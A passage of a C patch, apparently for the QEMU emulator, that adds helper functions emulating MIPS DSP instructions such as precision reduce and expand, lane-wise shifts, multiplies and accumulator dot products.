(rt >> a) & MIPSDSP_Q0; \ + tempA = (rt >> b) & MIPSDSP_Q0; \ + \ + return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); \ +} + +PRECR_QB_PH(precr, 16, 0); +PRECR_QB_PH(precrq, 24, 8); + +#undef PRECR_QB_OH + +target_ulong helper_precr_sra_ph_w(uint32_t sa, target_ulong rs, + target_ulong rt) +{ + uint16_t tempB, tempA; + + tempB = ((int32_t)rt >> sa) & MIPSDSP_LO; + tempA = ((int32_t)rs >> sa) & MIPSDSP_LO; + + return MIPSDSP_RETURN32_16(tempB, tempA); +} + +target_ulong helper_precr_sra_r_ph_w(uint32_t sa, + target_ulong rs, target_ulong rt) +{ + uint64_t tempB, tempA; + + /* If sa = 0, then (sa - 1) = -1 will case shift error, so we need else. */ + if (sa == 0) { + tempB = (rt & MIPSDSP_LO) << 1; + tempA = (rs & MIPSDSP_LO) << 1; + } else { + tempB = ((int32_t)rt >> (sa - 1)) + 1; + tempA = ((int32_t)rs >> (sa - 1)) + 1; + } + rt = (((tempB >> 1) & MIPSDSP_LO) << 16) | ((tempA >> 1) & MIPSDSP_LO); + + return (target_long)(int32_t)rt; +} + +target_ulong helper_precrq_ph_w(target_ulong rs, target_ulong rt) +{ + uint16_t tempB, tempA; + + tempB = (rs & MIPSDSP_HI) >> 16; + tempA = (rt & MIPSDSP_HI) >> 16; + + return MIPSDSP_RETURN32_16(tempB, tempA); +} + +target_ulong helper_precrq_rs_ph_w(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + uint16_t tempB, tempA; + + tempB = mipsdsp_trunc16_sat16_round(rs, env); + tempA = mipsdsp_trunc16_sat16_round(rt, env); + + return MIPSDSP_RETURN32_16(tempB, tempA); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_precr_ob_qh(target_ulong rs, target_ulong rt) +{ + uint8_t rs6, rs4, rs2, rs0; + uint8_t rt6, rt4, rt2, rt0; + uint64_t temp; + + rs6 = (rs >> 48) & MIPSDSP_Q0; + rs4 = (rs >> 32) & MIPSDSP_Q0; + rs2 = (rs >> 16) & MIPSDSP_Q0; + rs0 = rs & MIPSDSP_Q0; + rt6 = (rt >> 48) & MIPSDSP_Q0; + rt4 = (rt >> 32) & MIPSDSP_Q0; + rt2 = (rt >> 16) & MIPSDSP_Q0; + rt0 = rt & MIPSDSP_Q0; + + temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | + ((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | + ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | + ((uint64_t)rt2 << 8) | (uint64_t)rt0; + + return temp; +} + +#define PRECR_QH_PW(name, var) \ +target_ulong helper_precr_##name##_qh_pw(target_ulong rs, target_ulong rt, \ + uint32_t sa) \ +{ \ + uint16_t rs3, rs2, rs1, rs0; \ + uint16_t rt3, rt2, rt1, rt0; \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + /* When sa = 0, we use rt2, rt0, rs2, rs0; \ + * when sa != 0, we use rt3, rt1, rs3, rs1. */ \ + if (sa == 0) { \ + tempD = rt2 << var; \ + tempC = rt0 << var; \ + tempB = rs2 << var; \ + tempA = rs0 << var; \ + } else { \ + tempD = (((int16_t)rt3 >> sa) + var) >> var; \ + tempC = (((int16_t)rt1 >> sa) + var) >> var; \ + tempB = (((int16_t)rs3 >> sa) + var) >> var; \ + tempA = (((int16_t)rs1 >> sa) + var) >> var; \ + } \ + \ + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +PRECR_QH_PW(sra, 0); +PRECR_QH_PW(sra_r, 1); + +#undef PRECR_QH_PW + +target_ulong helper_precrq_ob_qh(target_ulong rs, target_ulong rt) +{ + uint8_t rs6, rs4, rs2, rs0; + uint8_t rt6, rt4, rt2, rt0; + uint64_t temp; + + rs6 = (rs >> 56) & MIPSDSP_Q0; + rs4 = (rs >> 40) & MIPSDSP_Q0; + rs2 = (rs >> 24) & MIPSDSP_Q0; + rs0 = (rs >> 8) & MIPSDSP_Q0; + rt6 = (rt >> 56) & MIPSDSP_Q0; + rt4 = (rt >> 40) & MIPSDSP_Q0; + rt2 = (rt >> 24) & MIPSDSP_Q0; + rt0 = (rt >> 8) & MIPSDSP_Q0; + + temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | + ((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | + ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | + ((uint64_t)rt2 << 8) | (uint64_t)rt0; + + return temp; +} + +target_ulong helper_precrq_qh_pw(target_ulong rs, target_ulong rt) +{ + uint16_t tempD, tempC, tempB, tempA; + + tempD = (rs >> 48) & MIPSDSP_LO; + tempC = (rs >> 16) & MIPSDSP_LO; + tempB = (rt >> 48) & MIPSDSP_LO; + tempA = (rt >> 16) & MIPSDSP_LO; + + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); +} + +target_ulong helper_precrq_rs_qh_pw(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + uint32_t rs2, rs0; + uint32_t rt2, rt0; + uint16_t tempD, tempC, tempB, tempA; + + rs2 = (rs >> 32) & MIPSDSP_LLO; + rs0 = rs & MIPSDSP_LLO; + rt2 = (rt >> 32) & MIPSDSP_LLO; + rt0 = rt & MIPSDSP_LLO; + + tempD = mipsdsp_trunc16_sat16_round(rs2, env); + tempC = mipsdsp_trunc16_sat16_round(rs0, env); + tempB = mipsdsp_trunc16_sat16_round(rt2, env); + tempA = mipsdsp_trunc16_sat16_round(rt0, env); + + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); +} + +target_ulong helper_precrq_pw_l(target_ulong rs, target_ulong rt) +{ + uint32_t tempB, tempA; + + tempB = (rs >> 32) & MIPSDSP_LLO; + tempA = (rt >> 32) & MIPSDSP_LLO; + + return MIPSDSP_RETURN64_32(tempB, tempA); +} +#endif + +target_ulong helper_precrqu_s_qb_ph(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + uint8_t tempD, tempC, tempB, tempA; + uint16_t rsh, rsl, rth, rtl; + + rsh = (rs & MIPSDSP_HI) >> 16; + rsl = rs & MIPSDSP_LO; + rth = (rt & MIPSDSP_HI) >> 16; + rtl = rt & MIPSDSP_LO; + + tempD = mipsdsp_sat8_reduce_precision(rsh, env); + tempC = mipsdsp_sat8_reduce_precision(rsl, env); + tempB = mipsdsp_sat8_reduce_precision(rth, env); + tempA = mipsdsp_sat8_reduce_precision(rtl, env); + + return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_precrqu_s_ob_qh(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + int i; + uint16_t rs3, rs2, rs1, rs0; + uint16_t rt3, rt2, rt1, rt0; + uint8_t temp[8]; + uint64_t result; + + result = 0; + + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); + + temp[7] = mipsdsp_sat8_reduce_precision(rs3, env); + temp[6] = mipsdsp_sat8_reduce_precision(rs2, env); + temp[5] = mipsdsp_sat8_reduce_precision(rs1, env); + temp[4] = mipsdsp_sat8_reduce_precision(rs0, env); + temp[3] = mipsdsp_sat8_reduce_precision(rt3, env); + temp[2] = mipsdsp_sat8_reduce_precision(rt2, env); + temp[1] = mipsdsp_sat8_reduce_precision(rt1, env); + temp[0] = mipsdsp_sat8_reduce_precision(rt0, env); + + for (i = 0; i < 8; i++) { + result |= (uint64_t)temp[i] << (8 * i); + } + + return result; +} + +#define PRECEQ_PW(name, a, b) \ +target_ulong helper_preceq_pw_##name(target_ulong rt) \ +{ \ + uint16_t tempB, tempA; \ + uint32_t tempBI, tempAI; \ + \ + tempB = (rt >> a) & MIPSDSP_LO; \ + tempA = (rt >> b) & MIPSDSP_LO; \ + \ + tempBI = (uint32_t)tempB << 16; \ + tempAI = (uint32_t)tempA << 16; \ + \ + return MIPSDSP_RETURN64_32(tempBI, tempAI); \ +} + +PRECEQ_PW(qhl, 48, 32); +PRECEQ_PW(qhr, 16, 0); +PRECEQ_PW(qhla, 48, 16); +PRECEQ_PW(qhra, 32, 0); + +#undef PRECEQ_PW + +#endif + +#define PRECEQU_PH(name, a, b) \ +target_ulong helper_precequ_ph_##name(target_ulong rt) \ +{ \ + uint16_t tempB, tempA; \ + \ + tempB = (rt >> a) & MIPSDSP_Q0; \ + tempA = (rt >> b) & MIPSDSP_Q0; \ + \ + tempB = tempB << 7; \ + tempA = tempA << 7; \ + \ + return MIPSDSP_RETURN32_16(tempB, tempA); \ +} + +PRECEQU_PH(qbl, 24, 16); +PRECEQU_PH(qbr, 8, 0); +PRECEQU_PH(qbla, 24, 8); +PRECEQU_PH(qbra, 16, 0); + +#undef PRECEQU_PH + +#if defined(TARGET_MIPS64) +#define PRECEQU_QH(name, a, b, c, d) \ +target_ulong helper_precequ_qh_##name(target_ulong rt) \ +{ \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + tempD = (rt >> a) & MIPSDSP_Q0; \ + tempC = (rt >> b) & MIPSDSP_Q0; \ + tempB = (rt >> c) & MIPSDSP_Q0; \ + tempA = (rt >> d) & MIPSDSP_Q0; \ + \ + tempD = tempD << 7; \ + tempC = tempC << 7; \ + tempB = tempB << 7; \ + tempA = tempA << 7; \ + \ + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +PRECEQU_QH(obl, 56, 48, 40, 32); +PRECEQU_QH(obr, 24, 16, 8, 0); +PRECEQU_QH(obla, 56, 40, 24, 8); +PRECEQU_QH(obra, 48, 32, 16, 0); + +#undef PRECEQU_QH + +#endif + +#define PRECEU_PH(name, a, b) \ +target_ulong helper_preceu_ph_##name(target_ulong rt) \ +{ \ + uint16_t tempB, tempA; \ + \ + tempB = (rt >> a) & MIPSDSP_Q0; \ + tempA = (rt >> b) & MIPSDSP_Q0; \ + \ + return MIPSDSP_RETURN32_16(tempB, tempA); \ +} + +PRECEU_PH(qbl, 24, 16); +PRECEU_PH(qbr, 8, 0); +PRECEU_PH(qbla, 24, 8); +PRECEU_PH(qbra, 16, 0); + +#undef PRECEU_PH + +#if defined(TARGET_MIPS64) +#define PRECEU_QH(name, a, b, c, d) \ +target_ulong helper_preceu_qh_##name(target_ulong rt) \ +{ \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + tempD = (rt >> a) & MIPSDSP_Q0; \ + tempC = (rt >> b) & MIPSDSP_Q0; \ + tempB = (rt >> c) & MIPSDSP_Q0; \ + tempA = (rt >> d) & MIPSDSP_Q0; \ + \ + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +PRECEU_QH(obl, 56, 48, 40, 32); +PRECEU_QH(obr, 24, 16, 8, 0); +PRECEU_QH(obla, 56, 40, 24, 8); +PRECEU_QH(obra, 48, 32, 16, 0); + +#undef PRECEU_QH + +#endif + +/** DSP GPR-Based Shift Sub-class insns **/ +#define SHIFT_QB(name, func) \ +target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt) \ +{ \ + uint8_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x07; \ + \ + MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa); \ + rt2 = mipsdsp_##func(rt2, sa); \ + rt1 = mipsdsp_##func(rt1, sa); \ + rt0 = mipsdsp_##func(rt0, sa); \ + \ + return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ +} + +#define SHIFT_QB_ENV(name, func) \ +target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt,\ + CPUMIPSState *env) \ +{ \ + uint8_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x07; \ + \ + MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa, env); \ + rt2 = mipsdsp_##func(rt2, sa, env); \ + rt1 = mipsdsp_##func(rt1, sa, env); \ + rt0 = mipsdsp_##func(rt0, sa, env); \ + \ + return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ +} + +SHIFT_QB_ENV(shll, lshift8); +SHIFT_QB(shrl, rshift_u8); + +SHIFT_QB(shra, rashift8); +SHIFT_QB(shra_r, rnd8_rashift); + +#undef SHIFT_QB +#undef SHIFT_QB_ENV + +#if defined(TARGET_MIPS64) +#define SHIFT_OB(name, func) \ +target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa) \ +{ \ + int i; \ + uint8_t rt_t[8]; \ + uint64_t temp; \ + \ + sa = sa & 0x07; \ + temp = 0; \ + \ + for (i = 0; i < 8; i++) { \ + rt_t[i] = (rt >> (8 * i)) & MIPSDSP_Q0; \ + rt_t[i] = mipsdsp_##func(rt_t[i], sa); \ + temp |= (uint64_t)rt_t[i] << (8 * i); \ + } \ + \ + return temp; \ +} + +#define SHIFT_OB_ENV(name, func) \ +target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa, \ + CPUMIPSState *env) \ +{ \ + int i; \ + uint8_t rt_t[8]; \ + uint64_t temp; \ + \ + sa = sa & 0x07; \ + temp = 0; \ + \ + for (i = 0; i < 8; i++) { \ + rt_t[i] = (rt >> (8 * i)) & MIPSDSP_Q0; \ + rt_t[i] = mipsdsp_##func(rt_t[i], sa, env); \ + temp |= (uint64_t)rt_t[i] << (8 * i); \ + } \ + \ + return temp; \ +} + +SHIFT_OB_ENV(shll, lshift8); +SHIFT_OB(shrl, rshift_u8); + +SHIFT_OB(shra, rashift8); +SHIFT_OB(shra_r, rnd8_rashift); + +#undef SHIFT_OB +#undef SHIFT_OB_ENV + +#endif + +#define SHIFT_PH(name, func) \ +target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rth, rtl; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + rth = mipsdsp_##func(rth, sa, env); \ + rtl = mipsdsp_##func(rtl, sa, env); \ + \ + return MIPSDSP_RETURN32_16(rth, rtl); \ +} + +SHIFT_PH(shll, lshift16); +SHIFT_PH(shll_s, sat16_lshift); + +#undef SHIFT_PH + +#if defined(TARGET_MIPS64) +#define SHIFT_QH(name, func) \ +target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa) \ +{ \ + uint16_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa); \ + rt2 = mipsdsp_##func(rt2, sa); \ + rt1 = mipsdsp_##func(rt1, sa); \ + rt0 = mipsdsp_##func(rt0, sa); \ + \ + return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ +} + +#define SHIFT_QH_ENV(name, func) \ +target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa, \ + CPUMIPSState *env) \ +{ \ + uint16_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa, env); \ + rt2 = mipsdsp_##func(rt2, sa, env); \ + rt1 = mipsdsp_##func(rt1, sa, env); \ + rt0 = mipsdsp_##func(rt0, sa, env); \ + \ + return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ +} + +SHIFT_QH_ENV(shll, lshift16); +SHIFT_QH_ENV(shll_s, sat16_lshift); + +SHIFT_QH(shrl, rshift_u16); +SHIFT_QH(shra, rashift16); +SHIFT_QH(shra_r, rnd16_rashift); + +#undef SHIFT_QH +#undef SHIFT_QH_ENV + +#endif + +#define SHIFT_W(name, func) \ +target_ulong helper_##name##_w(target_ulong sa, target_ulong rt) \ +{ \ + uint32_t temp; \ + \ + sa = sa & 0x1F; \ + temp = mipsdsp_##func(rt, sa); \ + \ + return (target_long)(int32_t)temp; \ +} + +#define SHIFT_W_ENV(name, func) \ +target_ulong helper_##name##_w(target_ulong sa, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint32_t temp; \ + \ + sa = sa & 0x1F; \ + temp = mipsdsp_##func(rt, sa, env); \ + \ + return (target_long)(int32_t)temp; \ +} + +SHIFT_W_ENV(shll_s, sat32_lshift); +SHIFT_W(shra_r, rnd32_rashift); + +#undef SHIFT_W +#undef SHIFT_W_ENV + +#if defined(TARGET_MIPS64) +#define SHIFT_PW(name, func) \ +target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa) \ +{ \ + uint32_t rt1, rt0; \ + \ + sa = sa & 0x1F; \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + rt1 = mipsdsp_##func(rt1, sa); \ + rt0 = mipsdsp_##func(rt0, sa); \ + \ + return MIPSDSP_RETURN64_32(rt1, rt0); \ +} + +#define SHIFT_PW_ENV(name, func) \ +target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa, \ + CPUMIPSState *env) \ +{ \ + uint32_t rt1, rt0; \ + \ + sa = sa & 0x1F; \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + rt1 = mipsdsp_##func(rt1, sa, env); \ + rt0 = mipsdsp_##func(rt0, sa, env); \ + \ + return MIPSDSP_RETURN64_32(rt1, rt0); \ +} + +SHIFT_PW_ENV(shll, lshift32); +SHIFT_PW_ENV(shll_s, sat32_lshift); + +SHIFT_PW(shra, rashift32); +SHIFT_PW(shra_r, rnd32_rashift); + +#undef SHIFT_PW +#undef SHIFT_PW_ENV + +#endif + +#define SHIFT_PH(name, func) \ +target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt) \ +{ \ + uint16_t rth, rtl; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + rth = mipsdsp_##func(rth, sa); \ + rtl = mipsdsp_##func(rtl, sa); \ + \ + return MIPSDSP_RETURN32_16(rth, rtl); \ +} + +SHIFT_PH(shrl, rshift_u16); +SHIFT_PH(shra, rashift16); +SHIFT_PH(shra_r, rnd16_rashift); + +#undef SHIFT_PH + +/** DSP Multiply Sub-class insns **/ +/* Return value made up by two 16bits value. + * FIXME give the macro a better name. + */ +#define MUL_RETURN32_16_PH(name, func, \ + rsmov1, rsmov2, rsfilter, \ + rtmov1, rtmov2, rtfilter) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rsB, rsA, rtB, rtA; \ + \ + rsB = (rs >> rsmov1) & rsfilter; \ + rsA = (rs >> rsmov2) & rsfilter; \ + rtB = (rt >> rtmov1) & rtfilter; \ + rtA = (rt >> rtmov2) & rtfilter; \ + \ + rsB = mipsdsp_##func(rsB, rtB, env); \ + rsA = mipsdsp_##func(rsA, rtA, env); \ + \ + return MIPSDSP_RETURN32_16(rsB, rsA); \ +} + +MUL_RETURN32_16_PH(muleu_s_ph_qbl, mul_u8_u16, \ + 24, 16, MIPSDSP_Q0, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(muleu_s_ph_qbr, mul_u8_u16, \ + 8, 0, MIPSDSP_Q0, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mulq_rs_ph, rndq15_mul_q15_q15, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mul_ph, mul_i16_i16, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mul_s_ph, sat16_mul_i16_i16, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mulq_s_ph, sat16_mul_q15_q15, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); + +#undef MUL_RETURN32_16_PH + +#define MUL_RETURN32_32_ph(name, func, movbits) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rth; \ + int32_t temp; \ + \ + rsh = (rs >> movbits) & MIPSDSP_LO; \ + rth = (rt >> movbits) & MIPSDSP_LO; \ + temp = mipsdsp_##func(rsh, rth, env); \ + \ + return (target_long)(int32_t)temp; \ +} + +MUL_RETURN32_32_ph(muleq_s_w_phl, mul_q15_q15_overflowflag21, 16); +MUL_RETURN32_32_ph(muleq_s_w_phr, mul_q15_q15_overflowflag21, 0); + +#undef MUL_RETURN32_32_ph + +#define MUL_VOID_PH(name, use_ac_env) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rsl, rth, rtl; \ + int32_t tempB, tempA; \ + int64_t acc, dotp; \ + \ + MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + if (use_ac_env == 1) { \ + tempB = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rsl, rtl, env); \ + } else { \ + tempB = mipsdsp_mul_u16_u16(rsh, rth); \ + tempA = mipsdsp_mul_u16_u16(rsl, rtl); \ + } \ + \ + dotp = (int64_t)tempB - (int64_t)tempA; \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + dotp = dotp + acc; \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((dotp & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)(dotp & MIPSDSP_LLO); \ +} + +MUL_VOID_PH(mulsaq_s_w_ph, 1); +MUL_VOID_PH(mulsa_w_ph, 0); + +#undef MUL_VOID_PH + +#if defined(TARGET_MIPS64) +#define MUL_RETURN64_16_QH(name, func, \ + rsmov1, rsmov2, rsmov3, rsmov4, rsfilter, \ + rtmov1, rtmov2, rtmov3, rtmov4, rtfilter) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rs3, rs2, rs1, rs0; \ + uint16_t rt3, rt2, rt1, rt0; \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + rs3 = (rs >> rsmov1) & rsfilter; \ + rs2 = (rs >> rsmov2) & rsfilter; \ + rs1 = (rs >> rsmov3) & rsfilter; \ + rs0 = (rs >> rsmov4) & rsfilter; \ + rt3 = (rt >> rtmov1) & rtfilter; \ + rt2 = (rt >> rtmov2) & rtfilter; \ + rt1 = (rt >> rtmov3) & rtfilter; \ + rt0 = (rt >> rtmov4) & rtfilter; \ + \ + tempD = mipsdsp_##func(rs3, rt3, env); \ + tempC = mipsdsp_##func(rs2, rt2, env); \ + tempB = mipsdsp_##func(rs1, rt1, env); \ + tempA = mipsdsp_##func(rs0, rt0, env); \ + \ + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +MUL_RETURN64_16_QH(muleu_s_qh_obl, mul_u8_u16, \ + 56, 48, 40, 32, MIPSDSP_Q0, \ + 48, 32, 16, 0, MIPSDSP_LO); +MUL_RETURN64_16_QH(muleu_s_qh_obr, mul_u8_u16, \ + 24, 16, 8, 0, MIPSDSP_Q0, \ + 48, 32, 16, 0, MIPSDSP_LO); +MUL_RETURN64_16_QH(mulq_rs_qh, rndq15_mul_q15_q15, \ + 48, 32, 16, 0, MIPSDSP_LO, \ + 48, 32, 16, 0, MIPSDSP_LO); + +#undef MUL_RETURN64_16_QH + +#define MUL_RETURN64_32_QH(name, \ + rsmov1, rsmov2, \ + rtmov1, rtmov2) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rsB, rsA; \ + uint16_t rtB, rtA; \ + uint32_t tempB, tempA; \ + \ + rsB = (rs >> rsmov1) & MIPSDSP_LO; \ + rsA = (rs >> rsmov2) & MIPSDSP_LO; \ + rtB = (rt >> rtmov1) & MIPSDSP_LO; \ + rtA = (rt >> rtmov2) & MIPSDSP_LO; \ + \ + tempB = mipsdsp_mul_q15_q15(5, rsB, rtB, env); \ + tempA = mipsdsp_mul_q15_q15(5, rsA, rtA, env); \ + \ + return ((uint64_t)tempB << 32) | (uint64_t)tempA; \ +} + +MUL_RETURN64_32_QH(muleq_s_pw_qhl, 48, 32, 48, 32); +MUL_RETURN64_32_QH(muleq_s_pw_qhr, 16, 0, 16, 0); + +#undef MUL_RETURN64_32_QH + +void helper_mulsaq_s_w_qh(target_ulong rs, target_ulong rt, uint32_t ac, + CPUMIPSState *env) +{ + int16_t rs3, rs2, rs1, rs0; + int16_t rt3, rt2, rt1, rt0; + int32_t tempD, tempC, tempB, tempA; + int64_t acc[2]; + int64_t temp[2]; + int64_t temp_sum; + + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); + + tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); + tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); + tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); + tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); + + temp[0] = ((int32_t)tempD - (int32_t)tempC) + + ((int32_t)tempB - (int32_t)tempA); + temp[0] = (int64_t)(temp[0] << 30) >> 30; + if (((temp[0] >> 33) & 0x01) == 0) { + temp[1] = 0x00; + } else { + temp[1] = ~0ull; + } + + acc[0] = env->active_tc.LO[ac]; + acc[1] = env->active_tc.HI[ac]; + + temp_sum = acc[0] + temp[0]; + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && + ((uint64_t)temp_sum < (uint64_t)temp[0])) { + acc[1] += 1; + } + acc[0] = temp_sum; + acc[1] += temp[1]; + + env->active_tc.HI[ac] = acc[1]; + env->active_tc.LO[ac] = acc[0]; +} +#endif + +#define DP_QB(name, func, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint8_t rs3, rs2; \ + uint8_t rt3, rt2; \ + uint16_t tempB, tempA; \ + uint64_t tempC, dotp; \ + \ + rs3 = (rs >> rsmov1) & MIPSDSP_Q0; \ + rs2 = (rs >> rsmov2) & MIPSDSP_Q0; \ + rt3 = (rt >> rtmov1) & MIPSDSP_Q0; \ + rt2 = (rt >> rtmov2) & MIPSDSP_Q0; \ + tempB = mipsdsp_##func(rs3, rt3); \ + tempA = mipsdsp_##func(rs2, rt2); \ + dotp = (int64_t)tempB + (int64_t)tempA; \ + if (is_add) { \ + tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ + + dotp; \ + } else { \ + tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ + - dotp; \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((tempC & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)(tempC & MIPSDSP_LLO); \ +} + +DP_QB(dpau_h_qbl, mul_u8_u8, 1, 24, 16, 24, 16); +DP_QB(dpau_h_qbr, mul_u8_u8, 1, 8, 0, 8, 0); +DP_QB(dpsu_h_qbl, mul_u8_u8, 0, 24, 16, 24, 16); +DP_QB(dpsu_h_qbr, mul_u8_u8, 0, 8, 0, 8, 0); + +#undef DP_QB + +#if defined(TARGET_MIPS64) +#define DP_OB(name, add_sub, \ + rsmov1, rsmov2, rsmov3, rsmov4, \ + rtmov1, rtmov2, rtmov3, rtmov4) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + uint8_t rsD, rsC, rsB, rsA; \ + uint8_t rtD, rtC, rtB, rtA; \ + uint16_t tempD, tempC, tempB, tempA; \ + uint64_t temp[2]; \ + uint64_t acc[2]; \ + uint64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + rsD = (rs >> rsmov1) & MIPSDSP_Q0; \ + rsC = (rs >> rsmov2) & MIPSDSP_Q0; \ + rsB = (rs >> rsmov3) & MIPSDSP_Q0; \ + rsA = (rs >> rsmov4) & MIPSDSP_Q0; \ + rtD = (rt >> rtmov1) & MIPSDSP_Q0; \ + rtC = (rt >> rtmov2) & MIPSDSP_Q0; \ + rtB = (rt >> rtmov3) & MIPSDSP_Q0; \ + rtA = (rt >> rtmov4) & MIPSDSP_Q0; \ + \ + tempD = mipsdsp_mul_u8_u8(rsD, rtD); \ + tempC = mipsdsp_mul_u8_u8(rsC, rtC); \ + tempB = mipsdsp_mul_u8_u8(rsB, rtB); \ + tempA = mipsdsp_mul_u8_u8(rsA, rtA); \ + \ + temp[0] = (uint64_t)tempD + (uint64_t)tempC + \ + (uint64_t)tempB + (uint64_t)tempA; \ + \ + acc[0] = env->active_tc.LO[ac]; \ + acc[1] = env->active_tc.HI[ac]; \ + \ + if (add_sub) { \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] + temp[1]; \ + } else { \ + temp_sum = acc[0] - temp[0]; \ + if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ + acc[1] -= 